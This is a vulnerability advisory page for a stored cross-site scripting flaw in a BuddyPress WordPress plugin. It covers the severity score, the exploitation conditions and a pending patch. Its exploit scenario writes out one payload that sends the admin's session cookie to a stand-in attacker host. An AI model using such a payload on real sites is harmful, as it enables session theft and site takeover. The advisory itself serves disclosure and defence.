Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS still requires a victim to navigate to the injected page (UI:R); subscriber-level account needed (PR:L); payload executes in victim browser scope (S:C); no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Block, Suspend, Report for BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter in versions up to and including 3.6.4. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored XSS in the Block, Suspend, Report for BuddyPress WordPress plugin (bp-toolkit) through version 3.6.4 allows low-privileged authenticated attackers to inject persistent malicious scripts via the 'link' parameter in report submissions. Authenticated users with subscriber-level access can plant JavaScript payloads that execute in any visitor's browser upon accessing the affected report pages, with Changed Scope (S:C) indicating execution in the victim's security context rather than the application's. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a valid WordPress account at subscriber level or higher on the target site - on BuddyPress community sites with open registration this is freely obtainable without prior authorization. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 6.4 (Medium) reflects network-accessible, low-complexity exploitation requiring low privileges (PR:L, subscriber-level) with Changed Scope and Low confidentiality and integrity impact each. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers a free subscriber account on an open-registration BuddyPress community site and submits a report against another member, supplying a crafted 'link' value such as 'javascript:fetch("https://attacker.com/?c="+document.cookie)' as the report link. When a WordPress administrator later opens the submitted report in the wp-admin panel, the stored payload executes silently in the admin's browser, exfiltrating the admin session cookie and enabling the attacker to take full control of the WordPress site. |
| Remediation | An upstream fix has been committed to the WordPress Plugin SVN repository as changeset 3523211 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3523211%40bp-toolkit&new=3523211%40bp-toolkit); however, a specific released patched version number is not confirmed from available data - administrators should check the WordPress plugin repository for any version newer than 3.6.4 and update immediately if one is available. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42519
GHSA-wf3h-wgr2-59j7